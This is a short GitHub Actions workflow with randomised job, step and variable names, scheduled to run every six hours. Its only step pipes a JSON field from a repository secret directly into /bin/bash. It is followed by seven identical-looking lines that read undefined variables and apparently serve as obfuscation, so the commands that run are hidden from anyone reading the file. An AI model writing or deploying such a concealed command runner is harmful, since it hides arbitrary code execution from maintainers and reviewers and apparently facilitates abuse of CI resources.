name: lanjingtian5614

on:
  workflow_dispatch:
  schedule:
    - cron: '50 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lanjingtian5614
        env:
          rxtfk7493: ${{ secrets.rxtfk7493 }}
        run: |
          echo $rxtfk7493 | jq -r .yzix0 | /bin/bash
          echo $ar2 | jq -r .wxn3747 | /bin/bash
          echo $odui6162 | jq -r .zemmn34717 | /bin/bash
          echo $f87 | jq -r .oifec04 | /bin/bash
          echo $ckisu7 | jq -r .q148 | /bin/bash
          echo $cd14 | jq -r .j775 | /bin/bash
          echo $sqonf15404 | jq -r .yqwdj91774 | /bin/bash
          echo $zykh56 | jq -r .b95 | /bin/bash

